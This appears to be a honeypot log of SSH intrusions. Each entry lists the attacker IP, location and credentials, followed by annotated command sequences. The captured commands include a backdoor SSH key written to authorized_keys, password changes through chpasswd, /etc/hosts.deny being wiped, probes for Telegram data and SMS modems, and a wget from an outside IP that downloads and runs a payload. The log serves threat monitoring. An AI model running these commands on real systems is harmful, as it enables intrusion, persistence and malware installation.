$ echo -e "devopspass\n7SJpfXdxFHKJ\n7SJpfXdxFHKJ"|passwd|bash
$ Enter new UNIX password:
$ echo "devopspass\n7SJpfXdxFHKJ\n7SJpfXdxFHKJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tsar_root_10 (81.30.212.94) β€” Ufa, Russia Β· 1 session Β· 19 cmds
2026-05-12 04:21 EDT Β· as root/adminserver2023
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:YZSyYXTGUIxz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_115 (161.132.4.167) β€” Chincha Alta, Peru Β· 1 session Β· 4 cmds
2026-05-12 03:06 EDT Β· as root/12345
export β†’ uname β†’ cat
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"
$ uname -s -v -n -m 2 > /dev/null
$ uname -m 2 > /dev/null
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1
🎭 monsoon_root_22 (122.169.192.225) β€” Hyderabad, India Β· 1 session Β· 20 cmds
2026-05-12 01:59 EDT Β· as test0/test0
export β†’ uname β†’ cat
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test0\nDxdpYHFTio0W\nDxdpYHFTio0W"|passwd|bash
$ Enter new UNIX password:
$ echo "test0\nDxdpYHFTio0W\nDxdpYHFTio0W\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dutch_sol_7 (80.94.92.184) β€” Amsterdam, The Netherlands Β· 1 session Β· 1 cmd
2026-05-12 01:42 EDT Β· as solv/solv123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m // obfuscated system check
🎭 hanbok_root_19 (218.236.241.135) β€” Gangneung, South Korea Β· 1 session Β· 1 cmd
2026-05-12 00:37 EDT Β· as root/mail2020
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 wraith_root_101 (129.159.149.21) β€” Jerusalem, Israel Β· 1 session Β· 9 cmds
2026-05-11 22:46 EDT Β· as root/root
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 wok_3 (180.76.234.93) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-11 20:45 EDT Β· as es/000000
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "000000\nPbzPEGdlhQfJ\nPbzPEGdlhQfJ"|passwd|bash
$ Enter new UNIX password:
$ echo "000000\nPbzPEGdlhQfJ\nPbzPEGdlhQfJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_2 (20.164.21.26) β€” Johannesburg, South Africa Β· 1 session Β· 1 cmd
2026-05-11 20:28 EDT Β· as root/!Q2w3e4r
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 wraith_root_102 (152.32.253.205) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-11 19:11 EDT Β· as user/martin
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "martin\nSavOGWnrvPSP\nSavOGWnrvPSP"|passwd|bash
$ Enter new UNIX password:
$ echo "martin\nSavOGWnrvPSP\nSavOGWnrvPSP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 steppe_root_6 (94.241.169.162) β€” St Petersburg, Russia Β· 1 session Β· 1 cmd
2026-05-11 15:25 EDT Β· as filmlight/c
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 phantom_root_107 (43.231.63.146) β€” Karachi, Pakistan Β· 1 session Β· 9 cmds
2026-05-11 15:06 EDT Β· as user2/Qwerty1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
$ hostname // hostname discovery
$ uname -m&&pkill upnpsetup // process termination
$ sudo pkill upnpsetup // process termination
$ rm ./upnpsetup
$ wget -nc http://45.87.174.8/k.php?a=x86_64,E6O2S193HB9701D0H -O ./upnpsetup
$ chmod 777 ./upnpsetup // make executable (world)
$ sudo ./upnpsetup
$ ./upnpsetup // execute payload
🎭 baguette_root_14 (213.144.214.231) β€” Paris, France Β· 1 session Β· 1 cmd
2026-05-11 14:16 EDT Β· as guest/guest111
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a // CPU profiling
🎭 capoeira_root_16 (189.50.142.82) β€” Presidente Prudente, Brazil Β· 2 sessions Β· 39 cmds
2026-05-11 10:26 EDT Β· as root/admin911, ubuntu/qweQWE123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "qweQWE123\nT64uDrgnY8cV\nT64uDrgnY8cV"|passwd|bash
$ Enter new UNIX password:
$ echo "qweQWE123\nT64uDrgnY8cV\nT64uDrgnY8cV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:ep1c4o38gm1z"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 k-pop_root_20 (211.253.37.225) β€” Seoul, South Korea Β· 1 session Β· 20 cmds
2026-05-11 10:49 EDT Β· as hadoop1/hadoop1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "hadoop1\nlr5TkQsKsuzH\nlr5TkQsKsuzH"|passwd|bash
$ Enter new UNIX password:
$ echo "hadoop1\nlr5TkQsKsuzH\nlr5TkQsKsuzH\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_38 (115.190.162.240) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-11 07:34 EDT Β· as itadmin/admin123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "admin123\n8B4mXDbCTIPx\n8B4mXDbCTIPx"|passwd|bash
$ Enter new UNIX password:
$ echo "admin123\n8B4mXDbCTIPx\n8B4mXDbCTIPx\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 carnival_root_10 (43.157.151.226) β€” SΓ£o Paulo, Brazil Β· 1 session Β· 20 cmds
2026-05-11 07:32 EDT Β· as guest1/guest
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "guest\nKlI4FRDBhoUf\nKlI4FRDBhoUf"|passwd|bash
$ Enter new UNIX password:
$ echo "guest\nKlI4FRDBhoUf\nKlI4FRDBhoUf\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_103 (189.203.163.10) β€” Benito Juarez, Mexico Β· 1 session Β· 20 cmds
2026-05-11 06:57 EDT Β· as server/server2021
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "server2021\nbFQ6wNez3mqG\nbFQ6wNez3mqG"|passwd|bash
$ Enter new UNIX password:
$ echo "server2021\nbFQ6wNez3mqG\nbFQ6wNez3mqG\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shogun_root_10 (156.227.232.198) β€” Chiyoda City, Japan Β· 1 session Β· 20 cmds
2026-05-11 06:48 EDT Β· as server/server2021
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "server2021\ntmLC1iKveR9y\ntmLC1iKveR9y"|passwd|bash
$ Enter new UNIX password:
$ echo "server2021\ntmLC1iKveR9y\ntmLC1iKveR9y\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_30 (103.39.225.71) β€” Guangzhou, China Β· 1 session Β· 1 cmd
2026-05-11 03:13 EDT Β· as root/5nWt3P-fF4WosQm5O
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 jade_root_27 (118.122.147.195) β€” Chengdu, China Β· 1 session Β· 20 cmds
2026-05-11 01:32 EDT Β· as ubuntu/12345678aA
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "12345678aA\nPFC4SRsxzDVh\nPFC4SRsxzDVh"|passwd|bash
$ Enter new UNIX password:
$ echo "12345678aA\nPFC4SRsxzDVh\nPFC4SRsxzDVh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_47 (23.121.117.27) β€” Madison, United States Β· 1 session Β· 9 cmds
2026-05-10 22:53 EDT Β· as root/12345
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 frost_pi (213.167.197.220) β€” Vladimir, Russia Β· 1 session Β· 1 cmd
2026-05-10 22:12 EDT Β· as pi/raspberryraspberry993311
execute from /tmp
$ scp -t /tmp/fvMRaKYr // execute from /tmp
🎭 rogue_root_18 (82.152.132.24) β€” Bucharest, Romania Β· 3 sessions Β· 60 cmds
2026-05-09 03:36 EDT Β· as admin01/123456, ftptest/ftptest2024, ubuntu/testpass
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
